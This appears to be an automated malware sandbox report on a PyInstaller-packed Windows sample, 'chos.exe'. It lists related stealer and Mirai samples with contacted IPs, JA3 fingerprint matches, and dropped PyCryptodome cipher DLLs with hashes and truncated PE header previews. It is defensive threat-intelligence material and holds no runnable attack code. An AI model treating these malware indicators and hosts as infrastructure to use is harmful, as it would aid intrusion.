	arm.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	13.222.71.194
	http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450	Get hash	malicious	Unknown	Browse	52.24.227.163
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	18.242.255.3
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	44.228.127.176
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	3.251.85.156
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	18.184.233.255
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	18.194.49.4
	b3astmode.sh4.elf	Get hash	malicious	Mirai	Browse	18.244.62.223

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
74954a0c86284d0d6e1c4efefe92b521	file.exe	Get hash	malicious	Unknown	Browse	31.14.70.245
	yiDQb6GkBq.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar	Browse	31.14.70.245
	Document.lnk.download.lnk	Get hash	malicious	Unknown	Browse	31.14.70.245
	aLsxeH29P2.exe	Get hash	malicious	Unknown	Browse	31.14.70.245
	c9a6BV0eQO.exe	Get hash	malicious	Unknown	Browse	31.14.70.245
	dYUteuvmHn.exe	Get hash	malicious	Unknown	Browse	31.14.70.245
	new.ini.ps1	Get hash	malicious	Unknown	Browse	31.14.70.245
	ALFq7XP17d.lnk	Get hash	malicious	Unknown	Browse	31.14.70.245
	kYGxoN4JVW.bat	Get hash	malicious	Unknown	Browse	31.14.70.245
	pn866G3CCj.lnk	Get hash	malicious	Unknown	Browse	31.14.70.245

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_ARC4.pyd	shost.exe	Get hash	malicious	Python Stealer, Muck Stealer	Browse
	lz4wnSavmK.exe	Get hash	malicious	Python Stealer	Browse
	WVuXCNNYG0.exe	Get hash	malicious	Python Stealer	Browse
	dipwo1iToJ.exe	Get hash	malicious	Python Stealer	Browse
	ROh2ijuEpr.exe	Get hash	malicious	Babuk, Conti	Browse
	zed.exe	Get hash	malicious	Unknown	Browse
	back.ps1	Get hash	malicious	Unknown	Browse
	zed.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Python Stealer, Amadey, LummaC Stealer, Nymaim, Stealc	Browse
	file.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_ARC4.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.640339306680604
Encrypted:	false
SSDEEP:	192:dLklddyTHThob0q/tJRrlDfNYSOcqgYCWt:ZgcdZq/JJD6gRWt
MD5:	BCD8CAAF9342AB891BB1D8DD45EF0098
SHA1:	EE7760BA0FF2548F25D764F000EFBB1332BE6D3E
SHA-256:	78725D2F55B7400A3FCAFECD35AF7AEB253FBC0FFCDF1903016EB0AABD1B4E50
SHA-512:	8B6FB53AECB514769985EBFDAB1B3C739024597D9C35905E04971D5422256546F7F169BF98F9BAF7D9F42A61CFF3EE7A20664989D3000773BF5EDA10CB3A0C24
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: shost.exe, Detection: malicious, Browse Filename: lz4wnSavmK.exe, Detection: malicious, Browse Filename: WVuXCNNYG0.exe, Detection: malicious, Browse Filename: dipwo1iToJ.exe, Detection: malicious, Browse Filename: ROh2ijuEpr.exe, Detection: malicious, Browse Filename: zed.exe, Detection: malicious, Browse Filename: back.ps1, Detection: malicious, Browse Filename: zed.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...Y..f.........." ................P........................................p............`..........................................'......0(..d....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata..Z.... ......................@..@.data...H....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..(....`.......*..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_Salsa20.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.0194545642425075
Encrypted:	false
SSDEEP:	192:4t/1nCuqaL0kt7AznuRmceS4lDFhAlcqgcLg:F/k1ACln4lDogcLg
MD5:	F19CB847E567A31FAB97435536C7B783
SHA1:	4C8BFE404AF28C1781740E7767619A5E2D2FF2B7
SHA-256:	1ECE1DC94471D6977DBE2CEEBA3764ADF0625E2203D6257F7C781C619D2A3DAD
SHA-512:	382DC205F703FC3E1F072F17F58E321E1A65B86BE7D9D6B07F24A02A156308A7FEC9B1A621BA1F3428FD6BB413D14AE9ECB2A2C8DD62A7659776CFFDEBB6374C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...Z..f.........." ................P.....................................................`..........................................8......H9..d....`.......P..L............p..(....1...............................1..8............0...............................text...h........................... ..`.rdata..r....0......................@..@.data...H....@.......,..............@....pdata..L....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_chacha20.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.037456384995606
Encrypted:	false
SSDEEP:	192:st/1nCuqaL0ktPMn1ENe3erKr5br0YbsiDw6a9lkOcqgRGd:p/kpMIodrXbsiDS95gRGd
MD5:	DC14677EA8A8C933CC41F9CCF2BEDDC1
SHA1:	A6FB87E8F3540743097A467ABE0723247FDAF469
SHA-256:	68F081E96AE08617CF111B21EDED35C1774A5EF1223DF9A161C9445A78F25C73
SHA-512:	3ABA4CFCBBE4B350AB3230D488BD75186427E3AAAF38D19E0E1C7330F16795AD77FB6E26FF39AF29EAF4F5E8C42118CB680F90AFBFCA218AEDA64DC444675BA2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...Z..f.........." ................P.....................................................`......................................... 8.......8..d....`.......P..d............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..d....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..(....p.......2..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_pkcs1_decode.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14336
Entropy (8bit):	5.09191874780435
Encrypted:	false
SSDEEP:	192:rMVsiXeqVb0lIb0Pj5Jdfpm68WZDInU282tacqgYLg:rM7ali0Pj5JxCaDuUlgYLg
MD5:	C09BB8A30F0F733C81C5C5A3DAD8D76D
SHA1:	46FD3BA87A32D12F4EE14601D1AD73B78EDC81D1
SHA-256:	8A1B751DB47CE7B1D3BD10BEBFFC7442BE4CFB398E96E3B1FF7FB83C88A8953D
SHA-512:	691AC74FAE930E9CEABE782567EFB99C50DD9B8AD607DD7F99A5C7DF2FA2BEB7EDFE2EBB7095A72DA0AE24E688FBABD340EAE8B646D5B8C394FEE8DDD5E60D31
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d...X..f.........." ................P.....................................................`.........................................`8.......8..d....`.......P..(............p..(....1...............................1..8............0...............................text............................... ..`.rdata..6....0....... ..............@..@.data...x....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_aes.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	6.541423493519083
Encrypted:	false
SSDEEP:	384:f/UlZA5PUEllvxL/7v/iKBt5ByU0xGitqzSEkxGG7+tpKHb/LZ7fr52EkifcMxme:klcR7JriEbwDaS4j990th9VDBV
MD5:	0AB25F99CDAACA6B11F2ECBE8223CAD5
SHA1:	7A881B3F84EF39D97A31283DE6D7B7AE85C8BAE6
SHA-256:	6CE8A60D1AB5ADC186E23E3DE864D7ADF6BDD37E3B0C591FA910763C5C26AF60
SHA-512:	11E89EEF34398DF3B144A0303E08B3A4CAF41A9A8CA618C18135F561731F285F8CF821D81179C2C45F6EEB0E496D9DD3ECF6FF202A3C453C80AFEF8582D06C17
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...V..f.........." .....H...H......P.....................................................`.........................................p...........d...............................0......................................8............`...............................text...xG.......H.................. ..`.rdata.."6...`...8...L..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_aesni.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.367749645917753
Encrypted:	false
SSDEEP:	192:YiJBj5fq/Rk0kPLhOZ3UucCWuSKPEkA2bD9JXx03cqg5YUMLgs:/k1kTMZEjCWNaA2DTx0g5YUMLg
MD5:	B6EA675C3A35CD6400A7ECF2FB9530D1
SHA1:	0E41751AA48108D7924B0A70A86031DDE799D7D6
SHA-256:	76EF4C1759B5553550AB652B84F8E158BA8F34F29FD090393815F06A1C1DC59D
SHA-512:	E31FD33E1ED6D4DA3957320250282CFD9EB3A64F12DE4BD2DFE3410F66725164D96B27CAA34C501D1A535A5A2442D5F070650FD3014B4B92624EE00F1C3F3197
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.z.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...V..f.........." ......... ......P.....................................................`..........................................9......$:..d....`.......P...............p..(....1...............................1..8............0.. ............................text............................... ..`.rdata.......0......."..............@..@.data...8....@.......2..............@....pdata.......P.......4..............@..@.rsrc........`.......8..............@..@.reloc..(....p.......:..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_arc2.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	5.41148259289073
Encrypted:	false
SSDEEP:	192:w3d9FkHaz0EJvrj+CYuz7ucc9dG7otDr22KcqgOiewZjW:YkHEJzj+X6769lDzagO/w
MD5:	F14E1AA2590D621BE8C10321B2C43132
SHA1:	FD84D11619DFFDF82C563E45B48F82099D9E3130
SHA-256:	FCE70B3DAFB39C6A4DB85D2D662CB9EB9C4861AA648AD7436E7F65663345D177
SHA-512:	A86B9DF163007277D26F2F732ECAB9DBCA8E860F8B5809784F46702D4CEA198824FDEF6AB98BA7DDC281E8791C10EABA002ABDA6F975323B36D5967E0443C1E4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." ....."... ......P.....................................................`.........................................pI.......J..d....p.......`..................(....B...............................B..8............@...............................text...( .......".................. ..`.rdata..<....@.......&..............@..@.data...H....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..(............>..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_blowfish.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20992
Entropy (8bit):	6.041302713678401
Encrypted:	false
SSDEEP:	384:kUX0JfbRz5MLZA0nmwzMDYpJgLa0Mp8NDBcxgprAM:6NbRzWXwDqgLa1uBfP
MD5:	B127CAE435AEB8A2A37D2A1BC1C27282
SHA1:	2A7BF8BF7F24B2381370BA6B41FB640EE42BDCCD
SHA-256:	538B1253B5929254ED92129FA0957DB26CDDF34A8372BA0BF19D20D01549ADA3
SHA-512:	4FE027E46D5132CA63973C67BD5394F2AC74DD4BBCFE93CB16136FAB4B6BF67BECB5A0D4CA359FF9426DA63CA81F793BBF1B79C8A9D8372C53DCB5796D17367E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." .....$...0......P.....................................................`.........................................0Y.......Y..d............p..................0....Q...............................R..8............@...............................text....".......$.................. ..`.rdata.......@... ...(..............@..@.data...H....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..0............P..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_cast.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	6.530656045206549
Encrypted:	false
SSDEEP:	384:cEDwUBi9SPu71omZXmrfXA+UA10ol31tuXVYdAgYj:FsUBXmoEXmrXA+NNxWFYfo
MD5:	2E15AA6F97ED618A3236CFA920988142
SHA1:	A9D556D54519D3E91FA19A936ED291A33C0D1141
SHA-256:	516C5EA47A7B9A166F2226ECBA79075F1A35EFFF14D87E00006B34496173BB78
SHA-512:	A6C75C4A285753CC94E45500E8DD6B6C7574FB7F610FF65667F1BEC8D8B413FC10514B7D62F196C2B8D017C308C5E19E2AEF918021FA81D0CB3D8CED37D8549A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...W..f.........." .....$...>............................................................`..........................................h.......i..d...............................0....a...............................a..8............@...............................text....#.......$.................. ..`.rdata..:-...@.......(..............@..@.data...H....p.......V..............@....pdata...............X..............@..@.rsrc................\..............@..@.reloc..0............^..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_cbc.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.7080156150187396
Encrypted:	false
SSDEEP:	192:lF/1n7Guqaj0ktfEJwX1fYwCODR3lncqg0Gd6l:RGXkJEm1feODxDg0Gd6
MD5:	40390F2113DC2A9D6CFAE7127F6BA329
SHA1:	9C886C33A20B3F76B37AA9B10A6954F3C8981772
SHA-256:	6BA9C910F755885E4D356C798A4DD32D2803EA4CFABB3D56165B3017D0491AE2
SHA-512:	617B963816838D649C212C5021D7D0C58839A85D4D33BBAF72C0EC6ECD98B609080E9E57AF06FA558FF302660619BE57CC974282826AB9F21AE0D80FBAA831A1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...X..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..(....p......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_cfb.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12800
Entropy (8bit):	5.159963979391524
Encrypted:	false
SSDEEP:	192:kblRgfeqfz0RP767fB4A84DgVD6eDcqgzbkLgmf:BwRj67p84Dg6eVgzbkLgmf
MD5:	899895C0ED6830C4C9A3328CC7DF95B6
SHA1:	C02F14EBDA8B631195068266BA20E03210ABEABC
SHA-256:	18D568C7BE3E04F4E6026D12B09B1FA3FAE50FF29AC3DEAF861F3C181653E691
SHA-512:	0B4C50E40AF92BC9589668E13DF417244274F46F5A66E1FC7D1D59BC281969BA319305BECEA119385F01CC4603439E4B37AFA2CF90645425210848A02839E3E7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^..6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...Jk.7?...J..7?..Rich6?..................PE..d...Y..f.........." ................P.....................................................`..........................................8......x9..d....`.......P..d............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......(..............@....pdata..d....P.......*..............@..@.rsrc........`......................@..@.reloc..(....p.......0..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ctr.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14848
Entropy (8bit):	5.270418334522813
Encrypted:	false
SSDEEP:	192:vktJ1gifqQGRk0IP73AdXdmEEEEEm9uhiFEQayDZVMcqgnF6+6Lg:vkdU1ID3AdXd49urQPDggnUjLg
MD5:	C4C525B081F8A0927091178F5F2EE103
SHA1:	A1F17B5EA430ADE174D02ECC0B3CB79DBF619900
SHA-256:	4D86A90B2E20CDE099D6122C49A72BAE081F60EB2EEA0F76E740BE6C41DA6749
SHA-512:	7C06E3E6261427BC6E654B2B53518C7EAA5F860A47AE8E80DC3F8F0FED91E122CB2D4632188DC44123FB759749B5425F426CD1153A8F84485EF0491002B26555
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^z.6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...J..7?...J..7?..Rich6?..........................PE..d...Y..f.........." ......... ......P.....................................................`.........................................`9.......:..d....`.......P...............p..(....1...............................1..8............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..(....p.......8..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_des.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	56832
Entropy (8bit):	4.231032526864278
Encrypted:	false
SSDEEP:	384:0qcmHBeNL1dO/qHkpnYcZiGKdZHDLY84vnKAnK2rZA21agVF:fEiqHHx4vZDV
MD5:	F9E266F763175B8F6FD4154275F8E2F0
SHA1:	8BE457700D58356BC2FA7390940611709A0E5473
SHA-256:	14D2799BE604CBDC668FDE8834A896EEE69DAE0E0D43B37289FCCBA35CEF29EC
SHA-512:	EB3E37A3C3FF8A65DEF6FA20941C8672A8197A41977E35AE2DC6551B5587B84C2703758320559F2C93C0531AD5C9D0F6C36EC5037669DC5CE78EB3367D89877B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d...X..f.........." .....6...................................................0............`.................................................\...d...............l............ ..0... ...............................@...8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...H...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_des3.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	4.252429732285762
Encrypted:	false
SSDEEP:	384:J4cmHBeIzNweVy/CHkRnYcZiGKdZHDLq80vnKAnKBrZGsURygUX:GEO6CHnX0vZb7
MD5:	DECF524B2D53FCD7D4FA726F00B3E5FC
SHA1:	E87C6ED4004F2772B888C5B5758AA75FE99D2F6F
SHA-256:	58F7053EE70467D3384C73F299C0DFD63EEF9744D61D1980D9D2518974CA92D4
SHA-512:	EAFF4FD80843743E61CE635FBADF4E5D9CF2C3E97F3C48350BD9E755F4423AC6867F9FE8746BD5C54E1402B18E8A55AEEF7ACA098C7CF4186DC4C1235EB35DF2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d...X..f.........." .....8...................................................0............`.....................................................d............................ ..0... ...............................@...8............P...............................text...X7.......8.................. ..`.rdata......P.......<..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ecb.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.690163963718492
Encrypted:	false
SSDEEP:	192:Yddz2KTnThIz0qfteRY4zp+D3PLui8p1cqgHCWt:k2E9RqfCXp+D3juRpLgiWt
MD5:	80BB1E0E06ACAF03A0B1D4EF30D14BE7
SHA1:	B20CAC0D2F3CD803D98A2E8A25FBF65884B0B619
SHA-256:	5D1C2C60C4E571B88F27D4AE7D22494BED57D5EC91939E5716AFA3EA7F6871F6
SHA-512:	2A13AB6715B818AD62267AB51E55CD54714AEBF21EC9EA61C2AEFD56017DC84A6B360D024F8682A2E105582B9C5FE892ECEBD2BEF8A492279B19FFD84BC83FA5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...X..f.........." ................P........................................p............`.........................................0'.......'..P....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_eksblowfish.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	6.1215844022564285
Encrypted:	false
SSDEEP:	384:nUX0JfbRwUtPMbNv37t6K5jwbDEpJgLa0Mp8xCkgJrAm:jNbRw8EbxwKBwbD+gLa1nh
MD5:	3727271FE04ECB6D5E49E936095E95BC
SHA1:	46182698689A849A8C210A8BF571D5F574C6F5B1
SHA-256:	3AF5B35DCD5A3B6C7E88CEE53F355AAFFF40F2C21DABD4DE27DBB57D1A29B63B
SHA-512:	5BED1F4DF678FE90B8E3F1B7C4F68198463E579209B079CB4A40DCAC01CE26AA2417DBE029B196F6F2C6AFAD560E2D1AF9F089ABE37EAD121CA10EE69D9659ED
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." .....(...0......P.....................................................`.........................................0Y.......Y..d............p..................0....Q...............................R..8............@...............................text...H'.......(.................. ..`.rdata.......@... ...,..............@..@.data...H....`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..0............T..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ocb.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	17920
Entropy (8bit):	5.293810509074883
Encrypted:	false
SSDEEP:	384:4PHoDUntQjNB+/yw/pogeXOvXoTezczOo3p9iJgDQ3iNgnVbwhA:dUOhBcDRogeXOfoTezcio3pUJgDQ3i+
MD5:	78AEF441C9152A17DD4DC40C7CC9DF69
SHA1:	6BB6F8426AFA6522E647DFC82B1B64FAF3A9781F
SHA-256:	56E4E4B156295F1AAA22ECB5481841DE2A9EB84845A16E12A7C18C7C3B05B707
SHA-512:	27B27E77BE81B29D42359FE28531225383860BCD19A79044090C4EA58D9F98009A254BF63585979C60B3134D47B8233941ABB354A291F23C8641A4961FA33107
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...Y..f.........." .....(... ......P.....................................................`.........................................pI......lJ..d....p.......`..................(....A...............................A..8............@...............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..(............D..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ofb.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	4.862619033406922
Encrypted:	false
SSDEEP:	96:0Ga+F/1NtJ9t4udqaj01rlALnNNJSS2sP+YEdMN+F9FdKaWDULk+VOmWbucX6gR7:PF/1n7Guqaj0ktfEON+bMDUlJcqg0Gd
MD5:	19E0ABF76B274C12FF624A16713F4999
SHA1:	A4B370F556B925F7126BF87F70263D1705C3A0DB
SHA-256:	D9FDA05AE16C5387AB46DC728C6EDCE6A3D0A9E1ABDD7ACB8B32FC2A17BE6F13
SHA-512:	D03033EA5CF37641FBD802EBEB5019CAEF33C9A78E01519FEA88F87E773DCA92C80B74BA80429B530694DAD0BFA3F043A7104234C7C961E18D48019D90277C8E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...Y..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......$..............@....pdata..X....P.......&..............@..@.rsrc........`.......*..............@..@.reloc..(....p.......,..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_BLAKE2b.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14336
Entropy (8bit):	5.227045547076371
Encrypted:	false
